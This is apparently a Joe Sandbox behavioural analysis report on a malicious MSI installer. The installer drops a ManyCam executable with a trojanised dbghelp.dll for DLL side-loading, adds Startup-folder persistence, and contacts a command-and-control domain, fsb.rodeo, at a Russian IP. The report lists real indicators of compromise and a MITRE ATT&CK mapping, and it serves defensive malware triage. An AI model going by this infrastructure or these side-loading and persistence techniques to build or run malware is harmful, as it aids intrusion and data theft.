Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Process created: C:\Windows\System32\pcaui.exe "c:\windows\system32\pcaui.exe" -g {11111111-1111-1111-1111-111111111111} -x {bce4b583-343f-44b8-8f95-9f76104077b9} -a "manycam" -v "manycam llc" -s "to work properly, this app must be reinstalled after you upgrade windows." -n 4 -f 0 -k 0 -e "c:\users\user\appdata\roaming\gjs_channel_x86\manycam.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Process created: C:\Windows\System32\pcaui.exe "c:\windows\system32\pcaui.exe" -g {11111111-1111-1111-1111-111111111111} -x {bce4b583-343f-44b8-8f95-9f76104077b9} -a "manycam" -v "manycam llc" -s "to work properly, this app must be reinstalled after you upgrade windows." -n 4 -f 0 -k 0 -e "c:\users\user\appdata\roaming\gjs_channel_x86\manycam.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Process created: C:\Windows\System32\pcaui.exe "c:\windows\system32\pcaui.exe" -g {11111111-1111-1111-1111-111111111111} -x {bce4b583-343f-44b8-8f95-9f76104077b9} -a "manycam" -v "manycam llc" -s "to work properly, this app must be reinstalled after you upgrade windows." -n 4 -f 0 -k 0 -e "c:\users\user\appdata\roaming\gjs_channel_x86\manycam.exe"	Jump to behavior

Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe

Code function: 2_2_00524748 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

2_2_00524748

Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe

Code function: 2_2_004170D0 memset,GetVersionExW,

2_2_004170D0

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Replication Through Removable Media	1 Command and Scripting Interpreter	11 DLL Side-Loading	311 Process Injection	21 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	1 Abuse Elevation Control Mechanism	1 Virtualization/Sandbox Evasion	LSASS Memory	221 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	11 DLL Side-Loading	11 Disable or Modify Tools	Security Account Manager	1 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	13 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	311 Process Injection	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	11 Peripheral Device Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Abuse Elevation Control Mechanism	Cached Domain Credentials	3 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Obfuscated Files or Information	DCSync	116 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 File Deletion	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
kvW4hZu9JA.msi	24%	ReversingLabs

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\blggjuprkr	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\klxgok	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Hazan\CrashRpt.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Hazan\ManyCam.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Hazan\cv099.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Hazan\cxcore099.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Hazan\cximagecrt.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Hazan\dbghelp.dll	42%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Hazan\highgui099.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\blggjuprkr	18%	ReversingLabs
C:\Users\user\AppData\Local\Temp\klxgok	18%	ReversingLabs
C:\Users\user\AppData\Roaming\gjs_channel_x86\CrashRpt.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	0%	ReversingLabs
C:\Users\user\AppData\Roaming\gjs_channel_x86\cv099.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\gjs_channel_x86\cxcore099.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\gjs_channel_x86\cximagecrt.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\gjs_channel_x86\dbghelp.dll	42%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Roaming\gjs_channel_x86\highgui099.dll	0%	ReversingLabs

Source	Detection	Scanner	Label	Link
http://www.symauth.com/cps0(	0%	URL Reputation	safe
http://www.symauth.com/rpa00	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
fsb.rodeo	193.233.48.182	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://fsb.rodeo/api	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.manycam.com/codec	ManyCam.exe, ManyCam.exe, 00000004.00000002.1780128540.00000000005A4000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 0000000D.00000000.2086046068.00000000005A4000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 00000014.00000000.2198807408.00000000005A4000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe.2.dr	false		unknown
http://www.vmware.com/0	ManyCam.exe, 00000002.00000002.1728202341.00000000041AB000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000004.00000002.1781456308.0000000003DAE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2016186641.0000000004D11000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2944068790.0000000002916000.00000004.00000001.00020000.00000000.sdmp, ManyCam.exe, 0000000D.00000002.2145200358.00000000041B2000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2201194681.0000000004AE2000.00000004.00000800.00020000.00000000.sdmp, ManyCam.exe, 00000014.00000002.2264806702.0000000003D99000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.2459356306.00000000058AF000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000018.00000002.2461639622.0000000002C9D000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://fsb.rodeo/G6	explorer.exe, 0000000C.00000003.2052808307.0000000000907000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2032321538.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2032220491.0000000000907000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.manycam.com/codecVerdanaThis	ManyCam.exe, 00000002.00000000.1712938372.000000000053B000.00000002.00000001.01000000.00000003.sdmp, ManyCam.exe, 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmp, ManyCam.exe, 00000004.00000000.1724343155.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 00000004.00000002.1780057255.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 0000000D.00000000.2085992542.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 0000000D.00000002.2142203285.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 00000014.00000000.2198684658.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 00000014.00000002.2261945134.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe.2.dr	false		unknown
http://manycam.com/help/effects	ManyCam.exe, ManyCam.exe, 00000004.00000000.1724343155.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 00000004.00000002.1780057255.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 0000000D.00000000.2085992542.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 0000000D.00000002.2142203285.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 00000014.00000000.2198684658.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 00000014.00000002.2261945134.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe.2.dr	false		unknown
https://fsb.rodeo:443/apiVC	explorer.exe, 0000000C.00000002.2943358115.0000000000920000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2052808307.0000000000907000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2658408368.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2657990402.0000000000907000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.vmware.com/0/	ManyCam.exe, 00000002.00000002.1728202341.00000000041AB000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000004.00000002.1781456308.0000000003DAE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2016186641.0000000004D11000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2944068790.0000000002916000.00000004.00000001.00020000.00000000.sdmp, ManyCam.exe, 0000000D.00000002.2145200358.00000000041B2000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2201194681.0000000004AE2000.00000004.00000800.00020000.00000000.sdmp, ManyCam.exe, 00000014.00000002.2264806702.0000000003D99000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.2459356306.00000000058AF000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000018.00000002.2461639622.0000000002C9D000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://download.manycam.com/effects/%s/%s?v=%sBackgroundsDynamicDynamic	ManyCam.exe, 00000002.00000000.1712938372.000000000053B000.00000002.00000001.01000000.00000003.sdmp, ManyCam.exe, 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmp, ManyCam.exe, 00000004.00000000.1724343155.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 00000004.00000002.1780057255.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 0000000D.00000000.2085992542.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 0000000D.00000002.2142203285.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 00000014.00000000.2198684658.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 00000014.00000002.2261945134.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe.2.dr	false		unknown
http://www.symauth.com/cps0(	ManyCam.exe, 00000002.00000002.1728202341.00000000041AB000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000004.00000002.1781456308.0000000003DAE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2016186641.0000000004D11000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2944068790.0000000002916000.00000004.00000001.00020000.00000000.sdmp, ManyCam.exe, 0000000D.00000002.2145200358.00000000041B2000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2201194681.0000000004AE2000.00000004.00000800.00020000.00000000.sdmp, ManyCam.exe, 00000014.00000002.2264806702.0000000003D99000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.2459356306.00000000058AF000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000018.00000002.2461639622.0000000002C9D000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.manycam.com	ManyCam.exe, ManyCam.exe, 00000004.00000002.1780128540.00000000005A4000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 0000000D.00000000.2086046068.00000000005A4000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 00000014.00000000.2198807408.00000000005A4000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe.2.dr	false		unknown
https://fsb.rodeo:443/api	explorer.exe, 0000000C.00000002.2942902216.00000000008B3000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://fsb.rodeo	cmd.exe, 00000006.00000002.2016861957.0000000005700000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2944859538.00007FF76CD5E000.00000002.00000001.01000000.00000000.sdmp, explorer.exe, 0000000C.00000002.2942902216.00000000008B3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.2459703674.0000000005E60000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000018.00000002.2462107505.00007FF78124E000.00000002.00000001.01000000.00000000.sdmp, blggjuprkr.22.dr	false		unknown
https://fsb.rodeo/	explorer.exe, 0000000C.00000003.2658566060.00000000008DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2943358115.0000000000920000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2032321538.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2658482872.00000000008D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2658408368.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2657990402.0000000000907000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2943162303.00000000008DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2032220491.0000000000907000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.manycam.com/codecVerdanaTo	ManyCam.exe, 00000002.00000000.1712938372.000000000053B000.00000002.00000001.01000000.00000003.sdmp, ManyCam.exe, 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmp, ManyCam.exe, 00000004.00000000.1724343155.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 00000004.00000002.1780057255.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 0000000D.00000000.2085992542.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 0000000D.00000002.2142203285.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 00000014.00000000.2198684658.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 00000014.00000002.2261945134.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe.2.dr	false		unknown
https://myexternalip.com/raw12fewer	blggjuprkr.22.dr	false		unknown
http://www.manycam.com/help/effects/snapshot/these	ManyCam.exe, 00000002.00000000.1712938372.000000000053B000.00000002.00000001.01000000.00000003.sdmp, ManyCam.exe, 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmp, ManyCam.exe, 00000004.00000000.1724343155.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 00000004.00000002.1780057255.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 0000000D.00000000.2085992542.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 0000000D.00000002.2142203285.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 00000014.00000000.2198684658.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 00000014.00000002.2261945134.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe.2.dr	false		unknown
https://fsb.rodeo/D6	explorer.exe, 0000000C.00000003.2032321538.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2032220491.0000000000907000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.symauth.com/rpa00	ManyCam.exe, 00000002.00000002.1728202341.00000000041AB000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000004.00000002.1781456308.0000000003DAE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2016186641.0000000004D11000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2944068790.0000000002916000.00000004.00000001.00020000.00000000.sdmp, ManyCam.exe, 0000000D.00000002.2145200358.00000000041B2000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2201194681.0000000004AE2000.00000004.00000800.00020000.00000000.sdmp, ManyCam.exe, 00000014.00000002.2264806702.0000000003D99000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.2459356306.00000000058AF000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000018.00000002.2461639622.0000000002C9D000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://docs.rs/getrandom#nodejs-es-module-supportinternal_codedescriptionunknown_codeos_errorUnknow	cmd.exe, 00000006.00000002.2016861957.0000000005700000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2944859538.00007FF76CD5E000.00000002.00000001.01000000.00000000.sdmp, cmd.exe, 00000016.00000002.2459703674.0000000005E60000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000018.00000002.2462107505.00007FF78124E000.00000002.00000001.01000000.00000000.sdmp, blggjuprkr.22.dr	false		unknown
http://manycam.com/upload_effect?filepath=ManyCam	ManyCam.exe, 00000002.00000000.1712938372.000000000053B000.00000002.00000001.01000000.00000003.sdmp, ManyCam.exe, 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmp, ManyCam.exe, 00000004.00000000.1724343155.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 00000004.00000002.1780057255.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 0000000D.00000000.2085992542.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 0000000D.00000002.2142203285.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 00000014.00000000.2198684658.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 00000014.00000002.2261945134.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe.2.dr	false		unknown
http://www.manycam.com0	ManyCam.exe, 00000002.00000003.1722253839.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000002.00000003.1723593860.0000000000E66000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000002.00000003.1721444923.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, cximagecrt.dll.2.dr, ManyCam.exe.2.dr	false		unknown
http://download.manycam.comVerdanaThis	ManyCam.exe, 00000002.00000000.1712938372.000000000053B000.00000002.00000001.01000000.00000003.sdmp, ManyCam.exe, 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmp, ManyCam.exe, 00000004.00000000.1724343155.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 00000004.00000002.1780057255.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 0000000D.00000000.2085992542.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 0000000D.00000002.2142203285.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 00000014.00000000.2198684658.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 00000014.00000002.2261945134.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe.2.dr	false		unknown
http://www.info-zip.org/	ManyCam.exe, 00000002.00000002.1728202341.0000000004155000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000004.00000002.1781456308.0000000003D58000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2016186641.0000000004CC8000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2944068790.00000000028CD000.00000004.00000001.00020000.00000000.sdmp, ManyCam.exe, 0000000D.00000002.2145200358.000000000415C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2201194681.0000000004A99000.00000004.00000800.00020000.00000000.sdmp, ManyCam.exe, 00000014.00000002.2264806702.0000000003D43000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.2459356306.0000000005866000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000018.00000002.2461639622.0000000002C54000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://download.manycam.com	ManyCam.exe, 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmp, ManyCam.exe, 00000002.00000003.1723593860.0000000000E66000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000004.00000002.1780128540.00000000005A4000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 0000000D.00000000.2086046068.00000000005A4000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 00000014.00000000.2198807408.00000000005A4000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe.2.dr	false		unknown
http://www.manycam.comhttp://manycam.com/feedback/?version=%sAnchor	ManyCam.exe, 00000002.00000000.1712938372.000000000053B000.00000002.00000001.01000000.00000003.sdmp, ManyCam.exe, 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmp, ManyCam.exe, 00000004.00000000.1724343155.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 00000004.00000002.1780057255.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 0000000D.00000000.2085992542.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 0000000D.00000002.2142203285.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 00000014.00000000.2198684658.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 00000014.00000002.2261945134.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe.2.dr	false		unknown
http://download.manycam.com/effects/%s/%s?v=%sManyCam	ManyCam.exe, 00000002.00000000.1712938372.000000000053B000.00000002.00000001.01000000.00000003.sdmp, ManyCam.exe, 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmp, ManyCam.exe, 00000004.00000000.1724343155.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 00000004.00000002.1780057255.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 0000000D.00000000.2085992542.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 0000000D.00000002.2142203285.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 00000014.00000000.2198684658.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 00000014.00000002.2261945134.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe.2.dr	false		unknown
http://download.manycam.comNew	ManyCam.exe, 00000002.00000000.1712938372.000000000053B000.00000002.00000001.01000000.00000003.sdmp, ManyCam.exe, 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmp, ManyCam.exe, 00000004.00000000.1724343155.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 00000004.00000002.1780057255.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 0000000D.00000000.2085992542.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 0000000D.00000002.2142203285.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 00000014.00000000.2198684658.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 00000014.00000002.2261945134.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe.2.dr	false		unknown
https://fsb.rodeo/apih-	explorer.exe, 0000000C.00000002.2943358115.0000000000954000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2658408368.0000000000954000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2657990402.0000000000954000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://fsb.rodeo/K	explorer.exe, 0000000C.00000002.2942902216.00000000008B3000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://manycam.com/feedback/?version=%s	ManyCam.exe	false		unknown
https://fsb.rodeo:443/api%C	explorer.exe, 0000000C.00000002.2943358115.0000000000920000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2658408368.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2657990402.0000000000907000.00000004.00000020.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
193.233.48.182	fsb.rodeo	Russian Federation		8325	NETIS-ASRU	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1536942
Start date and time:	2024-10-18 12:07:37 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 5s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	25
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	kvW4hZu9JA.msi renamed because original name is a hash value
Original Sample Name:	9cd2698d22ea6c144489b104d7d4680392f5ec333791fe164090b513b3073a7c.msi
Detection:	MAL
Classification:	mal100.expl.evad.winMSI@29/43@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 2 Number of non-executed functions: 272
Cookbook Comments:	Found application associated with file extension: .msi

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: kvW4hZu9JA.msi

Simulations

Behavior and APIs

Time	Type	Description
06:08:53	API Interceptor	2x Sleep call for process: cmd.exe modified
06:09:07	API Interceptor	2x Sleep call for process: explorer.exe modified
11:08:49	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BIT8E81.tmp
11:09:02	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\patchctrl_Po.lnk

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
193.233.48.182	tpHjYMAP4B.exe	Get hash	malicious	Unknown	Browse
193.233.48.182	tpHjYMAP4B.exe	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
fsb.rodeo	tpHjYMAP4B.exe	Get hash	malicious	Unknown	Browse	193.233.48.182
fsb.rodeo	tpHjYMAP4B.exe	Get hash	malicious	Unknown	Browse	193.233.48.182

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
